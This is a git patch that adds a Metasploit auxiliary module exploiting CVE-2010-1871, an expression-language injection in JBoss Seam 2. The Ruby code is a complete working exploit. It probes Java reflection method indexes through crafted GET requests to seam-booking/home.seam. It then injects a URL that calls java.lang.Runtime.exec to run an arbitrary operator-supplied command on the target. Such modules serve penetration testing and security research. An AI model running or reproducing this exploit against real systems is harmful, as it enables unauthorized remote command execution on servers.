From 453082678fde3bdf95ef845570f3e2516db6540b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 10 Nov 2011 10:21:17 -0600 Subject: [PATCH] Add CVE-2010-1871 (Feature #5922) --- .../auxiliary/admin/http/jboss_seam_exec.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/auxiliary/admin/http/jboss_seam_exec.rb diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb new file mode 100644 index 0000000000..05749209db --- /dev/null +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -0,0 +1,98 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'JBoss seam remote command execution', + 'Description' => %q{ + JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform + 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression + Language (EL) expressions, which allows remote attackers to execute arbitrary code + via a crafted URL. + + NOTE: this is only a vulnerability when the Java Security Manager is not properly + configured. + }, + 'Author' => [ 'guerrino di massa' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2010-1871' ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 19 2010')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']), + OptString.new('CMD', [ true, "The command to execute."]) + ], self.class) + end + + def run + jbr = datastore['JBOSS_ROOT'] + cmd_enc = "" + cmd_enc << Rex::Text.uri_encode(datastore["CMD"]) + + flag_found_one = 0 + flag_found_two = 0 + + uri_part_1 = "seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + uri_part_3 = "].invoke(null),'" + + print_status("Finding getDeclaredMethods() indexes... (0 to 24)") + + 25.times do |index| + req = jbr + uri_part_1 + index.to_s + "]}" + + res = send_request_cgi( + { + 'uri' => req, + 'method' => 'GET', + }, 20) + + if (res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29)) + flag_found_one = index + print_status("Found right index at [" + index.to_s + "]") + elsif (res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime)) + print_status("Found right index at [" + index.to_s + "]") + flag_found_two = index + else + print_status("Index [" + index.to_s + "]") + end + end + + if (flag_found_one > 0 && flag_found_two > 0 ) + print_status("Target appears VULNERABLE!") + print_status("Sending remote command:" + datastore["CMD"]) + + req = jbr + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}" + + res = send_request_cgi( + { + 'uri' => req, + 'method' => 'GET', + }, 20) + + if (res.headers['Location'] =~ %r(pwned=java.lang.UNIXProcess)) + print_status("Exploited successfully") + else + print_status("Exploit failed.") + end + else + print_error("Target appears not vulnerable!") + end + end +end